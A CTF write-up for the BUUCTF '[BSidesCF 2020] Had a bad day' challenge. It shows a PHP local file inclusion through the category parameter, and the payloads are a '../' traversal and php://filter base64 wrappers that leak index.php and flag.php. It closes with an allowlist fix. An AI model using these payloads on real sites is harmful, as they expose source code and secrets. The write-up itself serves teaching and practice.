BUUCTF Range 40 -- [BSidesCF 2020] Had a bad day
[PHP]
<?php
$file = $_GET['category'];
if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
include ($file . '.php');
}
else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
Clicking the two buttons gives, respectively:
http://40a9696d-4306-4473-a8c9-5 ... hp?category=woofers
http://40a9696d-4306-4473-a8c9-5 ... hp?category=meowers
[HTML]
<div class="page-include">
<center>
<h4> Meow! Meow! </h4>
</center>
<img style="width:100%" src="img/cat/4.jpg"> </div>
Try:
http://40a9696d-4306-4473-a8c9-5 ... ndex.php?category=1
Try again:
http://40a9696d-4306-4473-a8c9-5 ... category=woofers%27
Finally an error:
Warning: include(woofers'.php): failed to open stream: No such file or directory in /var/www/html/index.php on line 37
Warning: include(): Failed opening 'woofers'.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/index.php on line 37
Pattern:
The name after the equals sign is used as the PHP file name, with the suffix .php appended directly.
Verify:
http://40a9696d-4306-4473-a8c9-5 ... j.cn:81/woofers.php
Still the high-resolution picture, nice~~
This shows it is a code fragment inserted via include.
/index.php?category=php://filter/read=convert.base64-encode/resource=index
Read the source:
[PHP]
<html>
<body>
<h3>Cheer up!</h3>
<p>
Did you have a bad day? Did things not go your way today? Are you feeling down? Pick an option and let the adorable images cheer you up!
</p>
<div class="page-include">
<?php
$file = $_GET['category'];
if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
include ($file . '.php');
}
else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
</div>
<form action="index.php" method="get" id="choice">
<center><button name="category" value="woofers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Woofers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button>
<button name="category" value="meowers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Meowers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button></center>
</form>
</div>
</div>
</main>
</div>
</body>
</html>
The category parameter passed in must contain woofers, meowers or index.
Accessing directly: http://40a9696d-4306-4473-a8c9-5 ... uuoj.cn:81/flag.php returns only: <!-- Can you read this flag? -->
This shows that flag.php does exist in the current directory; how to read it?
Here we construct a payload to include flag.php:
[PHP]
/index.php?category=woofers/../flag
[PHP]
/index.php?category=php://filter/read=convert.base64-encode/resource=index/../flag
[PHP]
/index.php?category=php://filter/convert.base64-encode/index/resource=flag
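As an added example (not the challenge's own code), here is the page's substring check beside an allowlist fix, run over the two legitimate values and the three payloads above; the pages/ directory name is an assumption.

```php
<?php
// Added example: vulnerable check vs. allowlist fix for include($file . '.php').

// Vulnerable form (as on the page): a value passes if it merely *contains*
// "woofers" or "meowers", and the raw value is concatenated into the include path.
function vulnerableCheck(string $file): bool
{
    return strpos($file, "woofers") !== false
        || strpos($file, "meowers") !== false
        || strpos($file, "index");   // no "!== false": offset 0 is treated as false
}

// Hardened form: exact-match allowlist mapping to fixed file names, so neither
// "../" segments nor php:// wrappers ever reach include(). The pages/ directory
// is an assumption for this example.
const ALLOWED_PAGES = [
    'woofers' => 'woofers.php',
    'meowers' => 'meowers.php',
];

function resolvePage(?string $category): ?string
{
    if ($category === null || !array_key_exists($category, ALLOWED_PAGES)) {
        return null;                 // anything not in the map is rejected
    }
    return __DIR__ . '/pages/' . ALLOWED_PAGES[$category];
}

// Constructed sample inputs: legitimate values first, then the writeup's payloads.
$samples = [
    'woofers',
    'meowers',
    'woofers/../flag',
    'php://filter/read=convert.base64-encode/resource=index/../flag',
    'php://filter/convert.base64-encode/index/resource=flag',
];

foreach ($samples as $s) {
    printf("%-62s vulnerable=%-5s hardened=%s\n", $s,
        vulnerableCheck($s) ? 'pass' : 'block',
        resolvePage($s) !== null ? 'pass' : 'block');
}

// In a request handler the fixed code would read:
//   $page = resolvePage($_GET['category'] ?? null);
//   if ($page !== null) { include $page; }
//   else { echo "Sorry, we currently only support woofers and meowers."; }
```

All three payloads pass the substring check (each contains "woofers" or "index" at a non-zero offset) and are rejected by the allowlist.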